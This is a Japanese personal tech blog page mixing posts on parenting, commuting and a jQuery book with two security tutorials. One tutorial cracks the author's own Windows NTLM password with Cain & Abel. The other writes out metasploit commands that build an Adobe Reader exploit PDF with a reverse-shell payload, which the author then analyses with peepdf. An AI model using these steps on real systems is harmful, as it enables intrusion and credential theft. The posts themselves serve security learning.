読者です 読者をやめる 読者になる 読者になる

かわろぐ

技術、ボルダリング、セキュリティ、その他もろもろ

子どもが生まれて変わったブログ執筆スタイル

日常

f:id:kawa_xxx:20160925120340p:plain

子どもが生まれて早2ヶ月…早いもんですね。生活スタイルも大きく変わりましたが、まずはブログの執筆スタイルについてです。

パソコン中心からスマホ中心に

今までは、どんな記事も結構パソコンに向かって腰を据えて書くのが中心でした。ネタだしやザーッと下書きすることのみ電車内でスマホで行うという感じで記事を書いていました。

しかし、子供が生まれてからはスマホが中心でパソコンを使うのは最後の体裁を整えるのとポストする部分のみになりました。PCに向かっている時間を取るのが大変なんです。

だっこしろー!おむつが濡れたー!といろいろ呼び出しがありますから…

ただし、技術、セキュリティ関連の記事は色々検証が必要だったりスクリーンショットが必要で、ほとんどパソコンなのは変わらずです。

時には抱っこしながら

このブログ記事も、土曜日の昼下がりに泣き出してしまった赤ちゃんをだっこしながらぽちぽちと書いています。

最初は遅かったフリック入力も今では割りと早く文章を書けるようになりました。まだまだキーボードの入力速度にはほど遠いですが。

そして足元は掃除のために動かしたココロボが行ったり来たり。時々、蹴っ飛ばしてしまって、イテッて言われています。

環境に適応しつつ書き続ける

継続は力なり という名言?格言?はその通りだなと実体験を通じてそう感じています。最近だとボルダリングがそうですね。最初始めた時は一級なんで、絶対むりと思っていたけど、今では、何回もトライしますが、クリア出来る課題も出てきました。

ブログも同じように発信し続けていこうと思っています。ほとんどボルダリングと技術ネタで、後者は自分の忘却録的な感じになると思いますが。生きた証、もがいてきた証を今後も残していこうと思います。

ではまた。

Cain & Abel で自分の Windows のパスワードをクラックしてみた

Security

環境

  • Windows 10
  • Cain&Abel 4.9.56

Cain & Abel って?

Cain & Abel とは、Windows の GUI で操作できるパスワードクラッキングツールです。

昔からある定番ツールで、ローカルのアカウント情報から、ネットワークのスニッフィング、中間車攻撃など、クラック可能な範囲が広いのが特徴です。

このツールは名前の通り、GUI部分とサービスとして動作する部分の2つから構成されています。この記事では主に GUI の部分を使っていきます。

なお、必ず他人に危害の及ばない安全な環境で、研究、勉強目的に実施してください。

Cain& Abel をインストールする

セキュリティ系のツールは野良配布サイトよりも本家からハッシュがちゃんと明示されているものをダウンロードしましょう。

変なプログラムが追加されていたりしたら嫌ですからね。

本家から、Chrome でダウンロードしようとすると以下のように真っ赤なウインドウを表示してくれ、有害なプログラムがあることを訴えてくれます。

f:id:kawa_xxx:20160924154942p:plain

インストールはちょっと古めの Windows アプリにありがちなインストーラに従って勧めていくだけです。プレーンな windows 10 だとWinPcapがインストールできないようでそのままでは起動出来ませんでした。

f:id:kawa_xxx:20160924154944p:plain

仕方ないので WinPcap を公式サイトから落としてきてインストールします。

ローカルのパスワードをクラックしてみる

Cain & Abel の起動時に Windows ファイヤーウォールが動作していると一部機能しないよ!と警告メッセージが表示されます。今回はネットワーク系の機能は使わないので、とりあえずスルーします。

f:id:kawa_xxx:20160924154946p:plain

起動後のメイン画面です。うーん。古い Windows アプリを彷彿させるUIですね。まぁ古くからあるソフトなのですが。

f:id:kawa_xxx:20160924154950p:plain

ローカルの windows のパスワードをクラックしたいので、Cracker タブの LM & NTLM Hashes を選択し、+ ボタンでローカルのハッシュをインポートします。

f:id:kawa_xxx:20160924154948p:plain

正常に取り込みが完了すると自分のマシンにあるアカウントとハッシュのリストが表示されます。

今回クラックしたいアカウントは kawa-xxx というアカウントのパスワードなので、これを選択して右クリックし、Brute-Force Attack > NTLM Hashes を選択します。

今回は非常に簡単なパスワードを設定してあるので表示されたウインドウの設定のまま Start!

f:id:kawa_xxx:20160924154954p:plain

するとものの5秒程度でパスワードが解析されました。バッチリ自分がアカウントに設定したものと一緒です。

f:id:kawa_xxx:20160924154952p:plain

ほんと簡単なパスワードは危険ですね。みんなちゃんと複雑なパスワードを設定しましょう。

参考文献

ハッカーの学校

ハッカーの学校

peepdf を使って攻撃コードの入ったPDFを解析してみた

Security

環境

  • kali linux 2
  • peepdf 0.3

peepdf って?

python で作られている PDF 解析ツールです。解析するだけでなく、もし、脆弱性を突くようなコードが埋め込まれていた場合はその脆弱性情報も合わせて表示してくれます。

Cuckoo や Thung などでも使用されているみたいですね。

peepdf のセットアップ

kali linux なら、peepdf は OS をインストールした状態で使えるようになっているので、 kali linux を使いましょう。

解析対象の PDF を作成する

metasploit を用いて、脆弱性を突くコードの入ったPDFファイルを作成します。 metasploit も kali linux ならば OS をインストールした状態で使えるようになっています。

今回使用する脆弱性は CVE-2008-2992 という Adobe Reader の Util.PRINTF() に存在するバッファオーバーフローの脆弱性を利用するJSコードです。古い脆弱性ですが、外部に送信しないように注意して扱いましょう。

metasploit のコンソールに以下のように1行ずつ打ち込んでいきます。

msf> use exploit/windows/fileformat/adobe_utilprintf
msf> set FILENAME malicious.pdf
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.11
msf> set LPORT 4455
msf> exploit

export を実行すると/root/.msf4/local/malicious.pdfというパスにファイルが生成されるので、扱いやすいように Desktop に移動します。

作成した PDF を解析してみる

$ peepdf ~/Desktop/malicious.pdf

を実行すると解析結果をコンソールに出力してくれます。

f:id:kawa_xxx:20160919165223p:plain

バッチリ CVE-2008-2992 の攻撃コードがあることが検出されていますね。もう少しこのコードがどのようなものか深ぼって見ましょう。

$peepdf -i ~/Desktop/malicious.pdf

今度は -i インタラクティブオプションをつけて実行します。先ずは、該当部分の JS コードをプレーンな状態で見てみましょう。

PPDF> js_code 6

を実行するとバーっとコードを出力してくれます。画面上部が切れていますが、以下の感じですね。

f:id:kawa_xxx:20160919165226p:plain

最後の行に今回ターゲットにした関数 util.printf() が使われているのがわかります。更に JavaScript の解析も出来るようなので以下のコマンドでやってみました。

PPDF> js_analyse object 5

pyV8 が入っていないので、 解析時にエラー…

このあたりを参考にして pyV8 と V8 を入れてみようと試みましたが、うまく行かず… Github の方のコードを取ってきてもだめ。もちろん pip install pyV8 でもだめ。

どうしたらいいんだ… 続きはまた今度。

参考文献

サイバーセキュリティテスト完全ガイド ~Kali Linuxによるペネトレーションテスト~

サイバーセキュリティテスト完全ガイド ~Kali Linuxによるペネトレーションテスト~

  • 作者: Peter Kim,八木橋優,前田優人,美濃圭佑,保要隆明,株式会社クイープ
  • 出版社/メーカー: マイナビ出版
  • 発売日: 2016/08/01
  • メディア: 単行本(ソフトカバー)
  • この商品を含むブログを見る

長時間通勤を有意義に過ごす私の4つの方法

日常

f:id:kawa_xxx:20160917112310p:plain

はい。まだ通勤で消耗している @kawa_xxx です。スーツを着て通勤はしていないですけどねw

子供が生まれた直後に実家に1ヶ月程度里帰りしまして、その時通勤に約1時間40分程度かかりました。自宅から会社までは約30分なのでゆうに3倍以上の通勤時間です。消耗しました。はい。

そんな 消耗戦 長い通勤時間を少しでも快適に有意義に過ごそうと主に電車内でやっていた4つのことです。やっぱり長い通勤時間はしんどいっす。

Kindleで読書をする

1番はこれです。紙の本を持ち歩かなくなってから、その時の体調などに合わせて読む本をかなりフレキシブルに変えています。眠くて頭がボーッとしている時に、重い技術書なんて頭に張ってこないですもん。さっと軽めの本に変えています。重い本を持ち歩いていたらそんなことは出来ないですよね。

Unlimited が始まってから、普段読まないようなジャンルの本も読みました。読み放題じゃなかったら絶対に読まないジャンルですね。

仕事に効く!仏教マネジメント

仕事に効く!仏教マネジメント

ブログの下書きをする

これもかなり時間を有効に使えます。技術系の技術は調査、検証がしんどいのではかどりません。

ボルダリングの記事とか、こういう記事はかなりはかどるんです。むしろ電車の中で大半を書き上げているきがしますね。

この記事でも書きましたが、Evernoteで下書きしているから、どこでもどのデバイスでもブログをかけるんです。快適。

人間観察をする

 ベッドタウンからの通勤時間帯の同じ電車、同じ車両なら大体乗っている人って同じなんですよね。

この人はここで降りるなとぼんやりとでも覚えておくと、座れる可能性が高くなります。あとはこの人こんなくせがあるんだーとか、この人センスいいなーとか。

観察していて、割れた iPhone をそのまま使っている人が意外と多かったのには驚きました。あれ、痛くないんですかね?

ゲームをする

最近だとポケモンGOですかね。時々 Ingress に切り替えたりしてます。地下鉄じゃないので、駅に止まるゆっくりになる時などは意外とプレイできました。自分は歩いていないですけど、歩数稼げましたね。

なんかこの項目は1番時間を消費してる感ありますよね。なにもインプットしてなければ、生みだしてもいない…

まぁ、でもリフレッシュのために必要と割り切っています。人間そんなパーフェクトにはできていないですし。

以上、4つ長時間通勤を有意義に保つためにやっていることでした。

でもやっぱり長時間通勤はツライので、ライフステージが変わっても、通勤時間は短く保ちたいなぁ。

書評:jQuery 入門道場を読んだ

書評

jQuery入門道場

jQuery入門道場

ちゃんとまとまっていて復習にも good

タイトルにもありますが、体系的に学べる jQuery 本 その通りかなって感じです。

仕事でも jQuery は使っていますが、今まではWeb 上の情報のみで勉強していたので、知識が細切れになっていた部分がありました。

本書を読んだことで、それら細切れの知識がつながったり、古い情報だった部分がちゃんとアップデートされました。

あぁ、先輩にこれ言われたわ…。プルリクでバシバシ指摘されたわ…。といろいろ過去を振り返りながら、とっても良い復習になりました。

もっと早く読んでおけばよかったなぁ。とちょっと後悔しています。

よく分かる jQuery Deferred っていう書籍も出されているようなのでこっちも読んでみよう!